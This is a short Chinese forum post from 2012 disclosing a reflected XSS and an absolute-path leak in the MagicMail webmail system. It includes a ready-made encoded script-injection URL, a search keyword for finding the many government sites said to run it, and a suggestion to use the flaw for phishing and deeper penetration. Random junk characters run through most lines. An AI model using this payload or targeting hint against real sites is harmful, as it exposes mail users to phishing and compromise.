今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
9 B) k* v9 L" V4 K, x3 n# k8 i1 @! c7 J) i
2 J' K0 H$ Q- N& h* b; V) ~, P4 ?) p' N包含 一个反射性XSS 以及 绝对路径泄漏
, ]: ~" W" L0 _# l看了看 貌似全部是linux的。
3 i3 {5 T" S. P( s " u7 h$ P% r$ ^! y/ ?
关键字:迈捷邮件系统 by MagicMail; O; y2 o" F8 J( ^
* ^1 ^5 l% F/ f+ `5 G' \可以看到很多政府网站都用这个邮件系统
2 B+ P+ p8 a L7 a: m
2 J! ~# ^/ U1 d绝对路径 http://madman.in/index.php?login_type=declare&language=0 W' P$ l# H; ^+ B
8 l S M% L2 a5 L# K/ m& ~ z( z% N) m+ S h
+ B6 T w9 B8 R- M& Q; J0 lXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
# x" ]4 R& z; ~
. A& i9 p+ D0 k! a0 B* g3 P7 e+ g3 U) v% r5 I. B, T
: r) c) X1 M5 I" s: b% @* k. ^
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等' f* k% w; Y" V8 ?& G6 B- V
/ [$ |- }% d$ R5 I" Q) |
修复方案:看官方补丁吧。
- J H: f! ~1 L |
发表于 2012-11-9 20:38:41
收藏
支持
反对